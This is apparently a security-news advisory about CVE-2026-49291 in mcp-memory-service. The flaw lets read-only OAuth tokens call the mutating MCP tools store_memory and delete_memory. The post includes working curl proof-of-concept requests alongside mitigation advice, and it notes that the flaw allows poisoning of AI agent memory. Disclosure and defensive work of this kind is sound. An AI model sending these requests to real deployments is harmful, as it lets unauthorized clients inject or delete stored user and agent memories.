Listen to this Post
How CVE-2026-49291 Works
The vulnerability resides in the MCP (Model Context Protocol) JSON‑RPC endpoint at `/mcp` of the mcp‑memory‑service, a semantic memory layer for AI applications. Prior to version 10.65.3, this endpoint is protected only by OAuth `read` scope for all incoming requests. When a request to `tools/call` is received, the service extracts the requested tool name and its arguments, then directly invokes `handle_tool_call(storage, tool_name, arguments)` without passing the authenticated user or performing any per‑tool scope check.
The MCP tool registry includes both read‑only tools and mutating tools such as `store_memory` and delete_memory. Because no additional authorization is enforced at the tool level, a client possessing only a read‑scoped OAuth token can call these write operations through the MCP endpoint. The `store_memory` tool creates a new `Memory` object and calls storage.store(...), while `delete_memory` invokes storage.delete(content_hash). Both reach the underlying storage sinks.
By contrast, the REST API correctly enforces the intended boundary: `POST /api/memories` uses `Depends(require_write_access)` and rejects a read‑only token with a `403 insufficient_scope` response. This inconsistency allows a read‑only client to bypass the write‑scope requirement and perform unauthorized data modifications or deletions, compromising the integrity of the memory database.
DailyCVE Form:
Platform: ……. mcp-memory-service
Version: …….. prior to 10.65.3
Vulnerability :…… OAuth read‑only clients can invoke mutating MCP tools
Severity: ……. High (CVSS 8.1)
date: ………. 2026‑06‑19
Prediction: ….. 2026‑06‑26 (expected patch release within one week)
What Undercode Say:
Analytics
- Attack Vector: Remote, requires a valid OAuth token with only `read` scope.
- Weakness: Missing Authorization (CWE‑862).
- Affected Component: `src/mcp_memory_service/web/api/mcp.py` – the `mcp_endpoint` relies on `require_read_access` and does not filter tools by scope.
- Impact Scope: Unauthorised data injection and deletion, affecting AI agent context and stored user memories.
Bash Commands & Codes
- Generate a read‑only OAuth token (example using `curl` and a JWT tool):
Assuming an OAuth token endpoint that returns a JWT with scope "read" TOKEN=$(curl -s -X POST https://auth.example.com/oauth/token \ -d "grant_type=client_credentials&scope=read" \ -u "client_id:client_secret" | jq -r '.access_token')
2. Confirm REST write endpoint rejects the token:
curl -X POST https://mcp-memory-service.example.com/api/memories \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{"content":"rest denied control"}'
Expected: HTTP 403 with "Required scope 'write' not granted"
3. Exploit via MCP `tools/call` to store a memory:
curl -X POST https://mcp-memory-service.example.com/mcp \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{
"jsonrpc": "2.0",
"id": 1,
"method": "tools/call",
"params": {
"name": "store_memory",
"arguments": {
"content": "mcp read scope stored this",
"tags": ["poc"]
}
}
}'
Observed: HTTP 200 JSON‑RPC success, storage sink reached
4. Exploit via MCP to delete a memory (requires known content_hash):
curl -X POST https://mcp-memory-service.example.com/mcp \
-H "Authorization: Bearer $TOKEN" \
-H "Content-Type: application/json" \
-d '{
"jsonrpc": "2.0",
"id": 2,
"method": "tools/call",
"params": {
"name": "delete_memory",
"arguments": {"content_hash": "<known_hash>"}
}
}'
Observed: HTTP 200 JSON‑RPC success, storage delete sink reached
Exploit:
An attacker with a read‑only OAuth token can directly call the `/mcp` endpoint with the `tools/call` method, specifying `store_memory` or `delete_memory` as the tool name. Because the endpoint does not enforce per‑tool scope restrictions, the request is forwarded to the underlying mutating handlers, resulting in unauthorised creation or deletion of memory entries. The exploit requires no additional privileges and can be performed remotely. The attack is particularly dangerous in multi‑agent systems where memory integrity is critical for correct AI behaviour.
Protection:
- Upgrade to mcp‑memory‑service version 10.65.3 or newer, which enforces `write` scope for mutating MCP tools.
- Revoke or restrict OAuth tokens that possess only the `read` scope, ensuring clients receive only the minimal permissions required for their use case.
- Monitor RPC invocation logs for unexpected `store_memory` or `delete_memory` calls and alert operations staff when such events are detected.
- Implement additional middleware or API gateway rules to block `tools/call` requests with mutating tool names unless the token includes `write` scope, until an upgrade is possible.
Impact:
A client intended to be read‑only can inject false or malicious memories into the database, or delete existing ones, through the MCP API. This can corrupt the memory database, influence future agent context with tampered data, and destroy stored user memories without the OAuth `write` scope required by the REST API. The CVSS score of 8.1 (High) reflects the significant risk to data integrity and availability. Successful exploitation undermines the reliability of AI applications that depend on the semantic memory layer, potentially leading to incorrect inferences or denial of service.
🎯Let’s Practice Exploiting & Learn Patching For Free:
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
